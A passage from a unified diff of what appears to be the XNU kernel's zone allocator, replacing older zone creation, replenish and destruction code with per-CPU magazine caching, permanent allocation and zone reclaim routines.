name (if zone is used by kalloc) - */ - char temp_zone_name[MAX_ZONE_NAME] = ""; - snprintf(temp_zone_name, MAX_ZONE_NAME, "%s%s", zone_heap_name(z), z->z_name); + if (zone->z_elems_free < n_elems + zone->z_elems_rsv / 2 && + os_sub_overflow(zone->z_elems_free, + zone->z_elems_rsv / 2, &n_elems)) { + n_elems = 0; + } - /* Check if boot-arg specified it should have a cache */ - if (track_this_zone(temp_zone_name, cache_zone_name)) { - flags |= ZC_CACHING; - } else if (zcc_kalloc && z->kalloc_heap) { - flags |= ZC_CACHING; + z_debug_assert(n_elems <= zc_mag_size()); + + if (__improbable(n_elems == 0)) { + /* + * If importing elements would deplete the zone, + * call zalloc_item_slow() + */ + return zalloc_item_slow(zone, zstats, flags); } + + if 
(__improbable(zone_caching_disabled)) { + if (__improbable(zone_caching_disabled < 0)) { + /* + * In the first 10s after boot, mess with + * the scan position in order to make early + * allocations patterns less predictible. + */ + zone_early_scramble_rr(zone, zstats); + } + return zalloc_item_fast(zone, zstats, flags); + } + + zalloc_import(zone, cache->zc_alloc_elems, n_elems); + + cache->zc_alloc_cur = n_elems; + zone_elems_free_sub(zone, n_elems); + + zone_unlock_nopreempt(zone); + + return zalloc_cached_fast(zone, zstats, flags, cache, NULL); } - if ((flags & ZC_CACHING) && - !z->tags && !z->zone_logging && !z->gzalloc_tracked) { - zcache_init(z); - } -#endif /* CONFIG_ZCACHE */ - lock_zone(z); - z->z_self = z; - unlock_zone(z); + uint16_t n_mags = 0; - return z; + /* + * If the recirculation depot has elements, then try to fill + * the local per-cpu depot to (1 / zc_recirc_denom) + */ + do { + mag = STAILQ_FIRST(&zone->z_recirc); + STAILQ_REMOVE_HEAD(&zone->z_recirc, zm_link); + STAILQ_INSERT_TAIL(&mags, mag, zm_link); + n_mags++; + + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_t e = mag->zm_elems[i]; + + if (!zone_meta_mark_used(zone_meta_from_element(e), e)) { + zone_meta_double_free_panic(zone, e, __func__); + } + } + } while (!STAILQ_EMPTY(&zone->z_recirc) && + zc_recirc_denom * n_mags * zc_mag_size() <= cache->zc_depot_max); + + zone_elems_free_sub(zone, n_mags * zc_mag_size()); + zone_counter_sub(zone, z_recirc_cur, n_mags); + + zone_unlock_nopreempt(zone); + + /* + * And then incorporate everything into our per-cpu layer. 
+ */ + mag = STAILQ_FIRST(&mags); + STAILQ_REMOVE_HEAD(&mags, zm_link); + mag = zone_magazine_replace(&cache->zc_alloc_cur, + &cache->zc_alloc_elems, mag); + z_debug_assert(cache->zc_alloc_cur == zc_mag_size()); + z_debug_assert(mag->zm_cur == 0); + + if (--n_mags > 0) { + zone_depot_lock_nopreempt(cache); + cache->zc_depot_cur += n_mags; + STAILQ_CONCAT(&cache->zc_depot, &mags); + zone_depot_unlock_nopreempt(cache); + } + + return zalloc_cached_fast(zone, zstats, flags, cache, mag); } -__startup_func -void -zone_create_startup(struct zone_create_startup_spec *spec) +/*! + * @function zalloc_cached + * + * @brief + * Performs allocations when zone caching is on. + * + * @discussion + * This function calls @c zalloc_cached_fast() when the caches have elements + * ready. + * + * Else it will call @c zalloc_cached_slow() so that the cache is refilled, + * which might switch to the @c zalloc_item_slow() track when the backing zone + * needs to be refilled. + */ +static void * +zalloc_cached(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) { - *spec->z_var = zone_create_ext(spec->z_name, spec->z_size, - spec->z_flags, spec->z_zid, spec->z_setup); + zone_cache_t cache; + + disable_preemption(); + cache = zpercpu_get(zone->z_pcpu_cache); + + if (cache->zc_alloc_cur == 0) { + if (__improbable(cache->zc_free_cur == 0)) { + return zalloc_cached_slow(zone, zstats, flags, cache); + } + zone_cache_swap_magazines(cache); + } + + return zalloc_cached_fast(zone, zstats, flags, cache, NULL); } -/* - * The 4 first field of a zone_view and a zone alias, so that the zone_or_view_t - * union works. trust but verify. +/*! + * @function zalloc_ext + * + * @brief + * The core implementation of @c zalloc(), @c zalloc_flags(), @c zalloc_percpu(). 
*/ -#define zalloc_check_zov_alias(f1, f2) \ - static_assert(offsetof(struct zone, f1) == offsetof(struct zone_view, f2)) -zalloc_check_zov_alias(z_self, zv_zone); -zalloc_check_zov_alias(z_stats, zv_stats); -zalloc_check_zov_alias(z_name, zv_name); -zalloc_check_zov_alias(z_views, zv_next); -#undef zalloc_check_zov_alias - -__startup_func -void -zone_view_startup_init(struct zone_view_startup_spec *spec) +void * +zalloc_ext(zone_t zone, zone_stats_t zstats, zalloc_flags_t flags) { - struct kalloc_heap *heap = NULL; - zone_view_t zv = spec->zv_view; - zone_t z; + /* + * KASan uses zalloc() for fakestack, which can be called anywhere. + * However, we make sure these calls can never block. + */ + assert(zone->kasan_fakestacks || + ml_get_interrupts_enabled() || + ml_is_quiescing() || + debug_mode_active() || + startup_phase < STARTUP_SUB_EARLY_BOOT); - switch (spec->zv_heapid) { - case KHEAP_ID_DEFAULT: - heap = KHEAP_DEFAULT; - break; - case KHEAP_ID_DATA_BUFFERS: - heap = KHEAP_DATA_BUFFERS; - break; - case KHEAP_ID_KEXT: - heap = KHEAP_KEXT; - break; - default: - heap = NULL; + /* + * Make sure Z_NOFAIL was not obviously misused + */ + if (zone->z_replenishes) { + assert((flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0); + } else if (flags & Z_NOFAIL) { + assert(!zone->exhaustible && + (flags & (Z_NOWAIT | Z_NOPAGEWAIT)) == 0); } - if (heap) { - z = kalloc_heap_zone_for_size(heap, spec->zv_size); - assert(z); - } else { - z = spec->zv_zone; - assert(spec->zv_size <= zone_elem_size(z)); +#if CONFIG_GZALLOC + if (__improbable(zone->gzalloc_tracked)) { + return zalloc_gz(zone, zstats, flags); } +#endif /* CONFIG_GZALLOC */ - zv->zv_zone = z; - zv->zv_stats = zalloc_percpu_permanent_type(struct zone_stats); - zv->zv_next = z->z_views; - if (z->z_views == NULL && z->kalloc_heap == KHEAP_ID_NONE) { - /* - * count the raw view for zones not in a heap, - * kalloc_heap_init() already counts it for its members. 
- */ - zone_view_count += 2; - } else { - zone_view_count += 1; + if (zone->z_pcpu_cache) { + return zalloc_cached(zone, zstats, flags); } - z->z_views = zv; + + return zalloc_item(zone, zstats, flags); } -zone_t -zone_create( - const char *name, - vm_size_t size, - zone_create_flags_t flags) +void * +zalloc(union zone_or_view zov) { - return zone_create_ext(name, size, flags, ZONE_ID_ANY, NULL); + return zalloc_flags(zov, Z_WAITOK); } -zone_t -zinit( - vm_size_t size, /* the size of an element */ - vm_size_t max, /* maximum memory to use */ - vm_size_t alloc __unused, /* allocation size */ - const char *name) /* a name for the zone */ +void * +zalloc_noblock(union zone_or_view zov) +{ + return zalloc_flags(zov, Z_NOWAIT); +} + +void * +zalloc_flags(union zone_or_view zov, zalloc_flags_t flags) { - zone_t z = zone_create(name, size, ZC_DESTRUCTIBLE); - zone_set_max(z, max); - return z; + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(!zone->z_percpu); + return zalloc_ext(zone, zstats, flags); } -void -zdestroy(zone_t z) +void * +zalloc_percpu(union zone_or_view zov, zalloc_flags_t flags) { - unsigned int zindex = zone_index(z); + zone_t zone = zov.zov_view->zv_zone; + zone_stats_t zstats = zov.zov_view->zv_stats; + assert(zone->z_percpu); + return (void *)__zpcpu_mangle(zalloc_ext(zone, zstats, flags)); +} - lock_zone(z); +static void * +_zalloc_permanent(zone_t zone, vm_size_t size, vm_offset_t mask) +{ + struct zone_page_metadata *page_meta; + vm_offset_t offs, addr; + zone_pva_t pva; - if (!z->destructible || zone_caching_enabled(z) || z->allows_foreign) { - panic("zdestroy: Zone %s%s isn't destructible", - zone_heap_name(z), z->z_name); - } + assert(ml_get_interrupts_enabled() || + ml_is_quiescing() || + debug_mode_active() || + startup_phase < STARTUP_SUB_EARLY_BOOT); - if (!z->z_self || z->expanding_no_vm_priv || z->expanding_vm_priv || - z->async_pending || z->waiting) { - panic("zdestroy: Zone %s%s in an 
invalid state for destruction", - zone_heap_name(z), z->z_name); - } + size = (size + mask) & ~mask; + assert(size <= PAGE_SIZE); -#if !KASAN_ZALLOC - /* - * Unset the valid bit. We'll hit an assert failure on further operations - * on this zone, until zinit() is called again. - * - * Leave the zone valid for KASan as we will see zfree's on quarantined free - * elements even after the zone is destroyed. - */ - z->z_self = NULL; -#endif - z->destroyed = true; - unlock_zone(z); + zone_lock(zone); + assert(zone->z_self == zone); - /* Dump all the free elements */ - zone_drop_free_elements(z); + for (;;) { + pva = zone->z_pageq_partial; + while (!zone_pva_is_null(pva)) { + page_meta = zone_pva_to_meta(pva); + if (page_meta->zm_bump + size <= PAGE_SIZE) { + goto found; + } + pva = page_meta->zm_page_next; + } -#if CONFIG_GZALLOC - if (__improbable(z->gzalloc_tracked)) { - /* If the zone is gzalloc managed dump all the elements in the free cache */ - gzalloc_empty_free_cache(z); + zone_expand_locked(zone, Z_WAITOK, NULL); } -#endif - - lock_zone(z); - while (!zone_pva_is_null(z->pages_sequester)) { - struct zone_page_metadata *page_meta; - vm_offset_t free_addr; - - page_meta = zone_sequestered_page_get(z, &free_addr); - unlock_zone(z); - kmem_free(submap_for_zone(z), free_addr, ptoa(z->alloc_pages)); - lock_zone(z); - } +found: + offs = (uint16_t)((page_meta->zm_bump + mask) & ~mask); + page_meta->zm_bump = (uint16_t)(offs + size); + page_meta->zm_alloc_size += size; + zone->z_elems_free -= size; + zpercpu_get(zone->z_stats)->zs_mem_allocated += size; -#if !KASAN_ZALLOC - /* Assert that all counts are zero */ - if (z->countavail || z->countfree || zone_size_wired(z) || - z->allfree_page_count || z->sequester_page_count) { - panic("zdestroy: Zone %s%s isn't empty at zdestroy() time", - zone_heap_name(z), z->z_name); + if (page_meta->zm_alloc_size >= PAGE_SIZE - sizeof(vm_offset_t)) { + zone_meta_requeue(zone, &zone->z_pageq_full, page_meta); } - /* consistency check: 
make sure everything is indeed empty */ - assert(zone_pva_is_null(z->pages_any_free_foreign)); - assert(zone_pva_is_null(z->pages_all_used_foreign)); - assert(zone_pva_is_null(z->pages_all_free)); - assert(zone_pva_is_null(z->pages_intermediate)); - assert(zone_pva_is_null(z->pages_all_used)); - assert(zone_pva_is_null(z->pages_sequester)); -#endif - - unlock_zone(z); - - simple_lock(&all_zones_lock, &zone_locks_grp); + zone_unlock(zone); - assert(!bitmap_test(zone_destroyed_bitmap, zindex)); - /* Mark the zone as empty in the bitmap */ - bitmap_set(zone_destroyed_bitmap, zindex); - num_zones_in_use--; - assert(num_zones_in_use > 0); + addr = offs + zone_pva_to_addr(pva); - simple_unlock(&all_zones_lock); + DTRACE_VM2(zalloc, zone_t, zone, void*, addr); + return (void *)addr; } -#pragma mark zone (re)fill, jetsam - -/* - * Dealing with zone allocations from the mach VM code. - * - * The implementation of the mach VM itself uses the zone allocator - * for things like the vm_map_entry data structure. In order to prevent - * an infinite recursion problem when adding more pages to a zone, zalloc - * uses a replenish thread to refill the VM layer's zones before they have - * too few remaining free entries. The reserved remaining free entries - * guarantee that the VM routines can get entries from already mapped pages. - * - * In order for that to work, the amount of allocations in the nested - * case have to be bounded. There are currently 2 replenish zones, and - * if each needs 1 element of each zone to add a new page to itself, that - * gives us a minumum reserve of 2 elements. - * - * There is also a deadlock issue with the zone garbage collection thread, - * or any thread that is trying to free zone pages. While holding - * the kernel's map lock they may need to allocate new VM map entries, hence - * we need enough reserve to allow them to get past the point of holding the - * map lock. 
After freeing that page, the GC thread will wait in drop_free_elements() - * until the replenish threads can finish. Since there's only 1 GC thread at a time, - * that adds a minimum of 1 to the reserve size. - * - * Since the minumum amount you can add to a zone is 1 page, we'll use 16K (from ARM) - * as the refill size on all platforms. - * - * When a refill zone drops to half that available, i.e. REFILL_SIZE / 2, - * zalloc_ext() will wake the replenish thread. The replenish thread runs - * until at least REFILL_SIZE worth of free elements exist, before sleeping again. - * In the meantime threads may continue to use the reserve until there are only REFILL_SIZE / 4 - * elements left. Below that point only the replenish threads themselves and the GC - * thread may continue to use from the reserve. - */ -static unsigned zone_replenish_loops; -static unsigned zone_replenish_wakeups; -static unsigned zone_replenish_wakeups_initiated; -static unsigned zone_replenish_throttle_count; - -#define ZONE_REPLENISH_TARGET (16 * 1024) -static unsigned zone_replenish_active = 0; /* count of zones currently replenishing */ -static unsigned zone_replenish_max_threads = 0; +static void * +_zalloc_permanent_large(size_t size, vm_offset_t mask) +{ + kern_return_t kr; + vm_offset_t addr; -LCK_GRP_DECLARE(zone_replenish_lock_grp, "zone_replenish_lock"); -LCK_SPIN_DECLARE(zone_replenish_lock, &zone_replenish_lock_grp); + kr = kernel_memory_allocate(kernel_map, &addr, size, mask, + KMA_KOBJECT | KMA_PERMANENT | KMA_ZERO, + VM_KERN_MEMORY_KALLOC); + if (kr != 0) { + panic("zalloc_permanent: unable to allocate %zd bytes (%d)", + size, kr); + } + return (void *)addr; +} -__abortlike -static void -zone_replenish_panic(zone_t zone, kern_return_t kr) +void * +zalloc_permanent(vm_size_t size, vm_offset_t mask) { - panic_include_zprint = TRUE; -#if CONFIG_ZLEAKS - if ((zleak_state & ZLEAK_STATE_ACTIVE)) { - panic_include_ztrace = TRUE; - } -#endif /* CONFIG_ZLEAKS */ - if (kr == KERN_NO_SPACE) 
{ - zone_t zone_largest = zone_find_largest(); - panic("zalloc: zone map exhausted while allocating from zone %s%s, " - "likely due to memory leak in zone %s%s " - "(%lu total bytes, %d elements allocated)", - zone_heap_name(zone), zone->z_name, - zone_heap_name(zone_largest), zone_largest->z_name, - (unsigned long)zone_size_wired(zone_largest), - zone_count_allocated(zone_largest)); + if (size <= PAGE_SIZE) { + zone_t zone = &zone_array[ZONE_ID_PERMANENT]; + return _zalloc_permanent(zone, size, mask); } - panic("zalloc: %s%s (%d elements) retry fail %d", - zone_heap_name(zone), zone->z_name, - zone_count_allocated(zone), kr); + return _zalloc_permanent_large(size, mask); } -static void -zone_replenish_locked(zone_t z, zalloc_flags_t flags, bool asynchronously) +void * +zalloc_percpu_permanent(vm_size_t size, vm_offset_t mask) { - int kmaflags = KMA_KOBJECT | KMA_ZERO; - vm_offset_t space, alloc_size; - uint32_t retry = 0; - kern_return_t kr; + zone_t zone = &zone_array[ZONE_ID_PERCPU_PERMANENT]; + return (void *)__zpcpu_mangle(_zalloc_permanent(zone, size, mask)); +} - if (z->noencrypt) { - kmaflags |= KMA_NOENCRYPT; - } - if (flags & Z_NOPAGEWAIT) { - kmaflags |= KMA_NOPAGEWAIT; - } - if (z->permanent) { - kmaflags |= KMA_PERMANENT; - } +/*! @} */ +#endif /* !ZALLOC_TEST */ +#pragma mark zone GC / trimming +#if !ZALLOC_TEST - for (;;) { - struct zone_page_metadata *page_meta = NULL; +static thread_call_data_t zone_defrag_callout; - /* - * Try to allocate our regular chunk of pages, - * unless the system is under massive pressure - * and we're looking for more than 2 pages. 
- */ - if (!z->percpu && z->alloc_pages > 2 && (vm_pool_low() || retry > 0)) { - alloc_size = round_page(zone_elem_size(z)); - } else { - alloc_size = ptoa(z->alloc_pages); - page_meta = zone_sequestered_page_get(z, &space); - } +static void +zone_reclaim_chunk(zone_t z, struct zone_page_metadata *meta, uint32_t free_count) +{ + vm_address_t page_addr; + vm_size_t size_to_free; + uint32_t bitmap_ref; + uint32_t page_count; + bool sequester = z->z_va_sequester && !z->z_destroyed; - unlock_zone(z); + zone_meta_queue_pop_native(z, &z->z_pageq_empty, &page_addr); -#if CONFIG_ZLEAKS - /* - * Do the zone leak activation here because zleak_activate() - * may block, and can't be done on the way out. - */ - if (__improbable(zleak_state & ZLEAK_STATE_ENABLED)) { - if (!(zleak_state & ZLEAK_STATE_ACTIVE) && - zone_submaps_approx_size() >= zleak_global_tracking_threshold) { - kr = zleak_activate(); - if (kr != KERN_SUCCESS) { - printf("Failed to activate live zone leak debugging (%d).\n", kr); - } - } - } -#endif /* CONFIG_ZLEAKS */ + page_count = meta->zm_chunk_len; - /* - * Trigger jetsams via the vm_pageout_garbage_collect thread if - * we're running out of zone memory - */ - if (is_zone_map_nearing_exhaustion()) { - thread_wakeup((event_t) &vm_pageout_garbage_collect); + if (meta->zm_alloc_size) { + zone_metadata_corruption(z, meta, "alloc_size"); + } + if (z->z_percpu) { + if (page_count != 1) { + zone_metadata_corruption(z, meta, "page_count"); } - - if (page_meta) { - kr = zone_sequestered_page_populate(z, page_meta, space, - alloc_size, kmaflags); - } else { - if (z->submap_idx == Z_SUBMAP_IDX_GENERAL_MAP && z->kalloc_heap != KHEAP_ID_NONE) { - kmaflags |= KMA_KHEAP; - } - kr = kernel_memory_allocate(submap_for_zone(z), - &space, alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE); + size_to_free = ptoa(z->z_chunk_pages); + os_atomic_sub(&zones_phys_page_mapped_count, + z->z_chunk_pages, relaxed); + } else { + if (page_count > z->z_chunk_pages) { + 
zone_metadata_corruption(z, meta, "page_count"); } - -#if !__LP64__ - if (kr == KERN_NO_SPACE && z->allows_foreign) { - /* - * For zones allowing foreign pages, fallback to the kernel map - */ - kr = kernel_memory_allocate(kernel_map, &space, - alloc_size, 0, kmaflags, VM_KERN_MEMORY_ZONE); + if (page_count < z->z_chunk_pages) { + /* Dequeue non populated VA from z_pageq_va */ + zone_meta_remqueue(z, meta + page_count); } -#endif + size_to_free = ptoa(page_count); + os_atomic_sub(&zones_phys_page_mapped_count, page_count, relaxed); + } - if (kr == KERN_SUCCESS) { - break; - } + zone_counter_sub(z, z_elems_free, free_count); + zone_counter_sub(z, z_elems_avail, free_count); + zone_counter_sub(z, z_wired_empty, page_count); + zone_counter_sub(z, z_wired_cur, page_count); + if (z->z_elems_free_min < free_count) { + z->z_elems_free_min = 0; + } else { + z->z_elems_free_min -= free_count; + } + if (z->z_elems_free_max < free_count) { + z->z_elems_free_max = 0; + } else { + z->z_elems_free_max -= free_count; + } - if (flags & Z_NOPAGEWAIT) { - lock_zone(z); - return; + bitmap_ref = 0; + if (sequester) { + if (meta->zm_inline_bitmap) { + for (int i = 0; i < meta->zm_chunk_len; i++) { + meta[i].zm_bitmap = 0; + } + } else { + bitmap_ref = meta->zm_bitmap; + meta->zm_bitmap = 0; } - - if (asynchronously) { - assert_wait_timeout(&z->prio_refill_count, - THREAD_UNINT, 1, 100 * NSEC_PER_USEC); - thread_block(THREAD_CONTINUE_NULL); - } else if (++retry == 3) { - zone_replenish_panic(z, kr); + meta->zm_chunk_len = 0; + } else { + if (!meta->zm_inline_bitmap) { + bitmap_ref = meta->zm_bitmap; } - - lock_zone(z); + zone_counter_sub(z, z_va_cur, z->z_percpu ? 
1 : z->z_chunk_pages); + bzero(meta, sizeof(*meta) * z->z_chunk_pages); } - zcram_and_lock(z, space, alloc_size); + zone_unlock(z); -#if CONFIG_ZLEAKS - if (__improbable(zleak_state & ZLEAK_STATE_ACTIVE)) { - if (!z->zleak_on && - zone_size_wired(z) >= zleak_per_zone_tracking_threshold) { - z->zleak_on = true; - } + if (bitmap_ref) { + zone_bits_free(bitmap_ref); } -#endif /* CONFIG_ZLEAKS */ -} - -/* - * High priority VM privileged thread used to asynchronously refill a given zone. - * These are needed for data structures used by the lower level VM itself. The - * replenish thread maintains a reserve of elements, so that the VM will never - * block in the zone allocator. - */ -__dead2 -static void -zone_replenish_thread(void *_z, wait_result_t __unused wr) -{ - zone_t z = _z; - current_thread()->options |= (TH_OPT_VMPRIV | TH_OPT_ZONE_PRIV); - - for (;;) { - lock_zone(z); - assert(z->z_self == z); - assert(z->zone_replenishing); - assert(z->prio_refill_count != 0); + /* Free the pages for metadata and account for them */ +#if KASAN_ZALLOC + kasan_poison_range(page_addr, size_to_free, ASAN_VALID); +#endif +#if VM_MAX_TAG_ZONES + if (z->tags) { + ztMemoryRemove(z, page_addr, size_to_free); + } +#endif /* VM_MAX_TAG_ZONES */ - while (z->countfree < z->prio_refill_count) { - assert(!z->expanding_no_vm_priv); - assert(!z->expanding_vm_priv); + if (sequester) { + kernel_memory_depopulate(zone_submap(z), page_addr, + size_to_free, KMA_KOBJECT, VM_KERN_MEMORY_ZONE); + } else { + kmem_free(zone_submap(z), page_addr, ptoa(z->z_chunk_pages)); + } - zone_replenish_locked(z, Z_WAITOK, true); + /* + * Freeing memory sometimes needs some (for example vm map entries + * to represent holes). + * + * If there are any active replenish threads, we need to let them work + * while we hold no locks. Only do so right after we just freed memory + * once however to give them even more chances to find fresh pages. 
+ */ + zone_replenish_wait_if_needed(); - assert(z->z_self == z); - zone_replenish_loops++; - } + thread_yield_to_preemption(); - /* Wakeup any potentially throttled allocations. */ - thread_wakeup(z); + zone_lock(z); - assert_wait(&z->prio_refill_count, THREAD_UNINT); + if (sequester) { + zone_meta_queue_push(z, &z->z_pageq_va, meta); + } +} - /* - * We finished refilling the zone, so decrement the active count - * and wake up any waiting GC threads. - */ - lck_spin_lock(&zone_replenish_lock); - assert(zone_replenish_active > 0); - if (--zone_replenish_active == 0) { - thread_wakeup((event_t)&zone_replenish_active); - } - lck_spin_unlock(&zone_replenish_lock); +static uint16_t +zone_reclaim_elements(zone_t z, uint16_t *count, zone_element_t *elems) +{ + uint16_t n = *count; - z->zone_replenishing = false; - unlock_zone(z); + z_debug_assert(n <= zc_mag_size()); - thread_block(THREAD_CONTINUE_NULL); - zone_replenish_wakeups++; + for (uint16_t i = 0; i < n; i++) { + zone_element_t ze = elems[i]; + elems[i].ze_value = 0; + zfree_drop(z, zone_element_validate(z, ze), ze, false); } + + *count = 0; + return n; } -void -zone_prio_refill_configure(zone_t z) +static uint16_t +zone_reclaim_recirc_magazine(zone_t z, struct zone_depot *mags) { - thread_t th; - kern_return_t tres; + zone_magazine_t mag = STAILQ_FIRST(&z->z_recirc); - lock_zone(z); - assert(!z->prio_refill_count && !z->destructible); - z->prio_refill_count = (uint16_t)(ZONE_REPLENISH_TARGET / zone_elem_size(z)); - z->zone_replenishing = true; - unlock_zone(z); + STAILQ_REMOVE_HEAD(&z->z_recirc, zm_link); + STAILQ_INSERT_TAIL(mags, mag, zm_link); + zone_counter_sub(z, z_recirc_cur, 1); - lck_spin_lock(&zone_replenish_lock); - ++zone_replenish_max_threads; - ++zone_replenish_active; - lck_spin_unlock(&zone_replenish_lock); - OSMemoryBarrier(); + z_debug_assert(mag->zm_cur == zc_mag_size()); - tres = kernel_thread_start_priority(zone_replenish_thread, z, - MAXPRI_KERNEL, &th); - if (tres != KERN_SUCCESS) { - 
panic("zone_prio_refill_configure, thread create: 0x%x", tres); + for (uint16_t i = 0; i < zc_mag_size(); i++) { + zone_element_t ze = mag->zm_elems[i]; + mag->zm_elems[i].ze_value = 0; + zfree_drop(z, zone_element_validate(z, ze), ze, true); } - thread_deallocate(th); + mag->zm_cur = 0; + + return zc_mag_size(); } static void -zone_randomize_freelist(zone_t zone, struct zone_page_metadata *meta, - vm_offset_t size, zone_addr_kind_t kind, unsigned int *entropy_buffer) -{ - const vm_size_t elem_size = zone_elem_size(zone); - vm_offset_t left, right, head, base; - vm_offset_t element; - - left = ZONE_PAGE_FIRST_OFFSET(kind); - right = size - ((size - left) % elem_size); - head = 0; - base = zone_meta_to_addr(meta, kind); - - while (left < right) { - if (zone_leaks_scan_enable || __improbable(zone->tags) || - random_bool_gen_bits(&zone_bool_gen, entropy_buffer, MAX_ENTROPY_PER_ZCRAM, 1)) { - element = base + left; - left += elem_size; - } else { - right -= elem_size; - element = base + right; - } +zone_depot_trim(zone_cache_t zc, struct zone_depot *head) +{ + zone_magazine_t mag; + + if (zc->zc_depot_cur == 0 || + 2 * (zc->zc_depot_cur + 1) * zc_mag_size() <= zc->zc_depot_max) { + return; + } - vm_offset_t *primary = (vm_offset_t *)element; - vm_offset_t *backup = get_backup_ptr(elem_size, primary); + zone_depot_lock(zc); - *primary = *backup = head ^ zp_nopoison_cookie; - head = element; + while (zc->zc_depot_cur && + 2 * (zc->zc_depot_cur + 1) * zc_mag_size() > zc->zc_depot_max) { + mag = STAILQ_FIRST(&zc->zc_depot); + STAILQ_REMOVE_HEAD(&zc->zc_depot, zm_link); + STAILQ_INSERT_TAIL(head, mag, zm_link); + zc->zc_depot_cur--; } - meta->zm_freelist_offs = (uint16_t)(head - base); + zone_depot_unlock(zc); } -/* - * Cram the given memory into the specified zone. Update the zone page count accordingly. +__enum_decl(zone_reclaim_mode_t, uint32_t, { + ZONE_RECLAIM_TRIM, + ZONE_RECLAIM_DRAIN, + ZONE_RECLAIM_DESTROY, +}); + +/*! 
+ * @function zone_reclaim + * + * @brief + * Drains or trim the zone. + * + * @discussion + * Draining the zone will free it from all its elements. + * + * Trimming the zone tries to respect the working set size, and avoids draining + * the depot when it's not necessary. + * + * @param z The zone to reclaim from + * @param mode The purpose of this reclaim. */ static void -zcram_and_lock(zone_t zone, vm_offset_t newmem, vm_size_t size) +zone_reclaim(zone_t z, zone_reclaim_mode_t mode) { - unsigned int entropy_buffer[MAX_ENTROPY_PER_ZCRAM] = { 0 }; - struct zone_page_metadata *meta; - zone_addr_kind_t kind; - uint32_t pg_count = (uint32_t)atop(size); - uint32_t zindex = zone_index(zone); - uint32_t free_count; - uint16_t empty_freelist_offs = PAGE_METADATA_EMPTY_FREELIST; - - /* Basic sanity checks */ - assert(zone != ZONE_NULL && newmem != (vm_offset_t)0); - assert((newmem & PAGE_MASK) == 0); - assert((size & PAGE_MASK) == 0); + struct zone_depot mags = STAILQ_HEAD_INITIALIZER(mags); + zone_magazine_t mag, tmp; - KDBG(MACHDBG_CODE(DBG_MACH_ZALLOC, ZALLOC_ZCRAM) | DBG_FUNC_START, - zindex, size); + zone_lock(z); - kind = zone_addr_kind(newmem, size); -#if DEBUG || DEVELOPMENT - if (zalloc_debug & ZALLOC_DEBUG_ZCRAM) { - kprintf("zcram(%p[%s%s], 0x%lx%s, 0x%lx)\n", zone, - zone_heap_name(zone), zone->z_name, (uintptr_t)newmem, - kind == ZONE_ADDR_FOREIGN ? "[F]" : "", (uintptr_t)size); - } -#endif /* DEBUG || DEVELOPMENT */ + if (mode == ZONE_RECLAIM_DESTROY) { + if (!z->z_destructible || z->z_pcpu_cache || + z->z_elems_rsv || z->z_allows_foreign) { + panic("zdestroy: Zone %s%s isn't destructible", + zone_heap_name(z), z->z_name); + } - /* - * Initialize the metadata for all pages. We dont need the zone lock - * here because we are not manipulating any zone related state yet. - * - * This includes randomizing the freelists as the metadata isn't - * published yet. 
- */ + if (!z->z_self || z->z_expander || z->z_expander_vm_priv || + z->z_async_refilling || z->z_expanding_wait) { + panic("zdestroy: Zone %s%s in an invalid state for destruction", + zone_heap_name(z), z->z_name); + } - if (kind == ZONE_ADDR_NATIVE) { +#if !KASAN_ZALLOC /* - * We're being called by zfill, - * zone_replenish_thread or vm_page_more_fictitious, + * Unset the valid bit. We'll hit an assert failure on further + * operations on this zone, until zinit() is called again. * - * which will only either allocate a single page, or `alloc_pages` - * worth. + * Leave the zone valid for KASan as we will see zfree's on + * quarantined free elements even after the zone is destroyed. */ - assert(pg_count <= zone->alloc_pages); - + z->z_self = NULL; +#endif + z->z_destroyed = true; + } else if (z->z_destroyed) { + return zone_unlock(z); + } else if (z->z_replenishes && z->z_async_refilling) { /* - * Make sure the range of metadata entries we're about to init - * have proper physical backing, then initialize them. + * If the zone is replenishing, leave it alone. 
*/ - meta = zone_meta_from_addr(newmem, kind); - zone_meta_populate(meta, meta + pg_count); + return zone_unlock(z); + } - if (zone->permanent) { - empty_freelist_offs = 0; + if (z->z_pcpu_cache) { + if (mode != ZONE_RECLAIM_TRIM) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + zc->zc_depot_max /= 2; + } + } else { + zpercpu_foreach(zc, z->z_pcpu_cache) { + if (zc->zc_depot_max > 0) { + zc->zc_depot_max--; + } + } } - meta[0] = (struct zone_page_metadata){ - .zm_index = zindex, - .zm_page_count = pg_count, - .zm_percpu = zone->percpu, - .zm_freelist_offs = empty_freelist_offs, - }; + zone_unlock(z); - for (uint32_t i = 1; i < pg_count; i++) { - meta[i] = (struct zone_page_metadata){ - .zm_index = zindex, - .zm_page_count = i, - .zm_percpu = zone->percpu, - .zm_secondary_page = true, - .zm_freelist_offs = empty_freelist_offs, - }; + if (mode == ZONE_RECLAIM_TRIM) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + zone_depot_trim(zc, &mags); + } + } else { + zpercpu_foreach(zc, z->z_pcpu_cache) { + zone_depot_lock(zc); + STAILQ_CONCAT(&mags, &zc->zc_depot); + zc->zc_depot_cur = 0; + zone_depot_unlock(zc); + } } - if (!zone->permanent) { - zone_randomize_freelist(zone, meta, - zone->percpu ? 
PAGE_SIZE : size, kind, entropy_buffer); + zone_lock(z); + + uint32_t freed = 0; + + STAILQ_FOREACH(mag, &mags, zm_link) { + freed += zone_reclaim_elements(z, + &mag->zm_cur, mag->zm_elems); + + if (freed >= zc_free_batch_size) { + z->z_elems_free_min += freed; + z->z_elems_free_max += freed; + z->z_elems_free += freed; + zone_unlock(z); + thread_yield_to_preemption(); + zone_lock(z); + freed = 0; + } } - } else { - if (!zone->allows_foreign || !from_foreign_range(newmem, size)) { - panic("zcram_and_lock: foreign memory [%lx] being crammed is " - "outside of foreign range", (uintptr_t)newmem); + + if (mode == ZONE_RECLAIM_DESTROY) { + zpercpu_foreach(zc, z->z_pcpu_cache) { + freed += zone_reclaim_elements(z, + &zc->zc_alloc_cur, zc->zc_alloc_elems); + freed += zone_reclaim_elements(z, + &zc->zc_free_cur, zc->zc_free_elems); + } + + z->z_elems_free_wss = 0; + z->z_elems_free_min = 0; + z->z_elems_free_max = 0; + z->z_contention_cur = 0; + z->z_contention_wma = 0; + } else { + z->z_elems_free_min += freed; + z->z_elems_free_max += freed; + } + z->z_elems_free += freed; + } + + for (;;) { + struct zone_page_metadata *meta; + uint32_t 